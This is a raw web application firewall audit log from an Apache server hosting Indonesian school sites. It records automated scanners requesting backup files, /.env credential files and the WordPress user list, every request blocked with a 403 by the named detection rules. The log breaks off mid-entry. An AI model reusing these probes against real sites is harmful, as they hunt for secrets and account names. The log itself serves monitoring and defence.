"/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228138766 1769 (- - -) Stopwatch2: 1747683228138766 1769; combined=705, p1=310, p2=357, p3=0, p4=0, p5=38, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13c5c81f-Z-- --2f35cd62-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9odgAAAEQ 103.236.140.4 35018 103.236.140.4 8181 --2f35cd62-B-- GET /admin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2; rv:52.7.2) Gecko/20100101 Firefox/52.7.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700317 --2f35cd62-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2f35cd62-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228440009 2240 (- - -) Stopwatch2: 1747683228440009 2240; combined=788, p1=338, p2=423, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f35cd62-Z-- --5bca232e-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oeAAAAFc 103.236.140.4 35916 103.236.140.4 8181 --5bca232e-B-- GET /bbs.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:66.0.3) Gecko/20100101 Firefox/66.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165872119 --5bca232e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5bca232e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228539066 2326 (- - -) Stopwatch2: 1747683228539066 2326; combined=847, p1=432, p2=386, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bca232e-Z-- --646ecc6d-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oewAAAFA 103.236.140.4 35922 103.236.140.4 8181 --646ecc6d-B-- GET /dump.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 157906407 --646ecc6d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --646ecc6d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228558056 1838 (- - -) Stopwatch2: 1747683228558056 1838; combined=694, p1=334, p2=327, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --646ecc6d-Z-- --0b7fca5e-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ofQAAAFU 103.236.140.4 35922 103.236.140.4 8181 --0b7fca5e-B-- GET /2025.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700325 --0b7fca5e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0b7fca5e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228598171 2608 (- - -) Stopwatch2: 1747683228598171 2608; combined=884, p1=392, p2=467, p3=0, p4=0, p5=25, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b7fca5e-Z-- --36633d0f-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ofwAAAEA 103.236.140.4 35922 103.236.140.4 8181 --36633d0f-B-- GET /js.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700328 --36633d0f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --36633d0f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228603151 1796 (- - -) Stopwatch2: 1747683228603151 1796; combined=662, p1=324, p2=312, p3=0, p4=0, p5=26, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36633d0f-Z-- --c35be04b-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oggAAAFQ 103.236.140.4 35916 103.236.140.4 8181 --c35be04b-B-- GET /erpustakaansmkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.80 Safari/537.36 OPR/56.0.3051.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182673 --c35be04b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c35be04b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228618680 1496 (- - -) Stopwatch2: 1747683228618680 1496; combined=608, p1=286, p2=298, p3=0, p4=0, p5=24, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c35be04b-Z-- --5451b41d-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ohAAAAE0 103.236.140.4 35916 103.236.140.4 8181 --5451b41d-B-- GET /2024.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182686 --5451b41d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5451b41d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228632098 1955 (- - -) Stopwatch2: 1747683228632098 1955; combined=753, p1=340, p2=386, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5451b41d-Z-- --0828662f-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ohgAAAEI 103.236.140.4 35916 103.236.140.4 8181 --0828662f-B-- GET /2018.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 OPR/53.0.2907.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700341 --0828662f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0828662f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228646596 1575 (- - -) Stopwatch2: 1747683228646596 1575; combined=638, p1=319, p2=290, p3=0, p4=0, p5=28, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0828662f-Z-- --c6983c40-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ohwAAAFE 103.236.140.4 35922 103.236.140.4 8181 --c6983c40-B-- GET /wp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165872182 --c6983c40-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c6983c40-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228646752 1563 (- - -) Stopwatch2: 1747683228646752 1563; combined=617, p1=304, p2=285, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6983c40-Z-- --2012e70d-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oiAAAAFY 103.236.140.4 35922 103.236.140.4 8181 --2012e70d-B-- GET /local.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 OPR/52.0.2871.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700350 --2012e70d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2012e70d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228654874 1605 (- - -) Stopwatch2: 1747683228654874 1605; combined=629, p1=313, p2=290, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2012e70d-Z-- --d133d517-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oigAAAEU 103.236.140.4 35922 103.236.140.4 8181 --d133d517-B-- GET /data.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 157906435 --d133d517-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d133d517-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228683524 1558 (- - -) Stopwatch2: 1747683228683524 1558; combined=583, p1=284, p2=274, p3=0, p4=0, p5=25, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d133d517-Z-- --3097060e-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oiwAAAE4 103.236.140.4 35916 103.236.140.4 8181 --3097060e-B-- GET /2019.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 OPR/54.0.2952.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165872200 --3097060e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3097060e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228684311 1500 (- - -) Stopwatch2: 1747683228684311 1500; combined=619, p1=290, p2=302, p3=0, p4=0, p5=27, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3097060e-Z-- --14a94306-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ojQAAAEM 103.236.140.4 35916 103.236.140.4 8181 --14a94306-B-- GET /erpustakaan.smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161448106 --14a94306-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --14a94306-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228718591 1625 (- - -) Stopwatch2: 1747683228718591 1625; combined=684, p1=320, p2=337, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14a94306-Z-- --15e74537-A-- [20/May/2025:02:55:34 +0700] aCuMtgZaP57SewDBUi9wkAAAAFE 103.236.140.4 59134 103.236.140.4 8181 --15e74537-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 85.13.86.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 85.13.86.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --15e74537-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15e74537-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747684534668193 2765 (- - -) Stopwatch2: 1747684534668193 2765; combined=1293, p1=416, p2=843, p3=0, p4=0, p5=34, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15e74537-Z-- --90a65905-A-- [20/May/2025:03:13:13 +0700] aCuQ2b8BMImlI6dyVeOQEQAAAMU 103.236.140.4 49176 103.236.140.4 8181 --90a65905-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.157.214 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.157.214 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --90a65905-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90a65905-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747685593304356 757 (- - -) Stopwatch2: 1747685593304356 757; combined=335, p1=278, p2=0, p3=0, p4=0, p5=57, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90a65905-Z-- --1934b601-A-- [20/May/2025:03:24:21 +0700] aCuTdWyGBQNQTJej4E6K6wAAAJg 103.236.140.4 60404 103.236.140.4 8181 --1934b601-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Googlebot-Video/1.0 Accept-Charset: utf-8 --1934b601-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1934b601-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747686261351351 745 (- - -) Stopwatch2: 1747686261351351 745; combined=321, p1=280, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1934b601-Z-- --5206997f-A-- [20/May/2025:03:26:54 +0700] aCuUDjuVdcwZ_qZ5ZIo1nwAAAAo 103.236.140.4 34616 103.236.140.4 8181 --5206997f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.232.225.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.232.225.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5206997f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5206997f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 